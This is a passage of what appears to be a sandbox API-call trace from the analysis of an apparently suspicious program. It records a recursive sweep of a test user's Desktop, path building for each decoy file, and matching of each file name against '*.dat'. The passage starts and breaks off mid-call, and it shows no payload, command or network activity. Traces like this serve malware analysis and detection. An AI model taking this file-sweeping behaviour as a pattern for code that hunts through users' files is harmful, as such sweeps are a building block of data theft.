(in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.677] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Izq83dPIx.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4" [0110.677] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.677] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.677] lstrcatW (in: lpString1="\\", lpString2="Izq83dPIx.mp4" | out: lpString1="\\Izq83dPIx.mp4") returned="\\Izq83dPIx.mp4" [0110.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", lpUsedDefaultChar=0x0) returned 45 [0110.677] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.713] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab40, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.713] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab40 | out: hHeap=0x29a0000) returned 1 [0110.713] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*.dat") returned 0 [0110.713] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.723] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6dde030, ftCreationTime.dwHighDateTime=0x1d7a99c, ftLastAccessTime.dwLowDateTime=0x51405ab0, ftLastAccessTime.dwHighDateTime=0x1d7aeb3, ftLastWriteTime.dwLowDateTime=0x51405ab0, ftLastWriteTime.dwHighDateTime=0x1d7aeb3, nFileSizeHigh=0x0, nFileSizeLow=0x12d9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8k6qCAjWYmc.odt", cAlternateFileName="K8K6QC~1.ODT")) returned 1 [0110.723] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.723] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.723] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt" [0110.723] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.723] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.723] lstrcatW (in: lpString1="\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="\\k8k6qCAjWYmc.odt") returned="\\k8k6qCAjWYmc.odt" [0110.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0110.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x39700d0, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", lpUsedDefaultChar=0x0) returned 48 [0110.723] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.723] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac48, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.723] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac48 | out: hHeap=0x29a0000) returned 1 [0110.723] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*.dat") returned 0 [0110.723] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.723] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KTOu", cAlternateFileName="")) returned 1 [0110.723] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.723] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.723] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.723] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.723] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.723] lstrcatW (in: lpString1="\\", lpString2="KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.723] lstrcmpW (lpString1="KTOu", lpString2=".") returned 1 [0110.724] lstrcmpW (lpString1="KTOu", lpString2="..") returned 1 [0110.724] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.724] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*" [0110.724] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743320 [0110.724] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.724] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.724] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\." [0110.724] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.724] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.724] lstrcatW (in: lpString1="\\KTOu\\", lpString2="." | out: lpString1="\\KTOu\\.") returned="\\KTOu\\." [0110.724] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.724] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.724] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.724] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.724] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.." [0110.724] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.724] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.724] lstrcatW (in: lpString1="\\KTOu\\", lpString2=".." | out: lpString1="\\KTOu\\..") returned="\\KTOu\\.." [0110.724] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.724] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.724] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f265de0, ftCreationTime.dwHighDateTime=0x1d7acc3, ftLastAccessTime.dwLowDateTime=0xe01b3e80, ftLastAccessTime.dwHighDateTime=0x1d7af08, ftLastWriteTime.dwLowDateTime=0xe01b3e80, ftLastWriteTime.dwHighDateTime=0x1d7af08, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CEoMqDCJmINqN85E.bmp", cAlternateFileName="3CEOMQ~1.BMP")) returned 1 [0110.725] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.725] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.725] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.725] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.725] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.725] lstrcatW (in: lpString1="\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x29a2cd8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", lpUsedDefaultChar=0x0) returned 58 [0110.725] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0110.725] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaae0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.725] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0110.725] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*.dat") returned 0 [0110.725] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a50 | out: hHeap=0x29a0000) returned 1 [0110.725] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1872110, ftCreationTime.dwHighDateTime=0x1d7a92f, ftLastAccessTime.dwLowDateTime=0xbc62b500, ftLastAccessTime.dwHighDateTime=0x1d7ace6, ftLastWriteTime.dwLowDateTime=0xbc62b500, ftLastWriteTime.dwHighDateTime=0x1d7ace6, nFileSizeHigh=0x0, nFileSizeLow=0x3ae1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUCY-_yVF.swf", cAlternateFileName="EUCY-_~1.SWF")) returned 1 [0110.725] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.725] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.725] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf" [0110.725] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.725] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.725] lstrcatW (in: lpString1="\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="\\KTOu\\eUCY-_yVF.swf") returned="\\KTOu\\eUCY-_yVF.swf" [0110.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x38ea7d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", lpUsedDefaultChar=0x0) returned 50 [0110.725] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea7d8 | out: hHeap=0x29a0000) returned 1 [0110.725] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aab10, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.726] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab10 | out: hHeap=0x29a0000) returned 1 [0110.726] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*.dat") returned 0 [0110.726] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.726] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f2e50, ftCreationTime.dwHighDateTime=0x1d7b054, ftLastAccessTime.dwLowDateTime=0xe568fc80, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xe568fc80, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xb99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HLPCM ND3Cl3FgAs3.mp4", cAlternateFileName="HLPCMN~1.MP4")) returned 1 [0110.726] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.726] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.726] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.726] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.726] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.726] lstrcatW (in: lpString1="\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x29a2e88, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", lpUsedDefaultChar=0x0) returned 58 [0110.726] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e88 | out: hHeap=0x29a0000) returned 1 [0110.726] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aab28, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.726] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab28 | out: hHeap=0x29a0000) returned 1 [0110.726] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*.dat") returned 0 [0110.726] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2780 | out: hHeap=0x29a0000) returned 1 [0110.726] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9803e0, ftCreationTime.dwHighDateTime=0x1d7a67d, ftLastAccessTime.dwLowDateTime=0xc285fda0, ftLastAccessTime.dwHighDateTime=0x1d7ada1, ftLastWriteTime.dwLowDateTime=0xc285fda0, ftLastWriteTime.dwHighDateTime=0x1d7ada1, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LQQ8KQ8OZpD-.wav", cAlternateFileName="LQQ8KQ~1.WAV")) returned 1 [0110.726] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.726] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.726] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.726] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.726] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.727] lstrcatW (in: lpString1="\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="\\KTOu\\LQQ8KQ8OZpD-.wav") returned="\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x38ea918, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", lpUsedDefaultChar=0x0) returned 53 [0110.727] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea918 | out: hHeap=0x29a0000) returned 1 [0110.727] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaae0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.727] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0110.727] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*.dat") returned 0 [0110.727] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0110.727] FindNextFileW (in: 